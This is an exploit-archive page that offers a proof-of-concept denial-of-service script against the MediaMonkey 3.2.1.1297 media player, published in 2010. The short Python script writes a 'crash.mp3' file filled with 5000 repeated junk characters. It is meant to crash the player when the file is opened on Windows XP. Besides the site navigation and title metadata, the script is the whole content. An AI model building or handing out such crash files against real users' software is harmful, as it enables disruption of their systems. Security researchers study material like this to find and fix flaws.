[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mediamonkey v. 3.2.1.1297 DOS POC
# Published : 2010-08-05
# Author : Abhishek Lyall
# Previous Title : Avast! Internet Security 5.0 aswFW.sys kernel driver IOCTL Memory Pool Corruption
# Next Title : ffdshow Video Codec Denial of Service Vulnerability
#Mediamonkey v. 3.2.1.1297 DOS POC
#vulnerble application link http://www.mediamonkey.com/trialpay
#tested on XP SP2/3
#author abhishek lyall - abhilyll[at]gmail[dot]com
#!/usr/bin/python
filename = "crash.mp3"
junk = "x41" * 5000
textfile = open(filename , 'w')
textfile.write(junk)
textfile.close()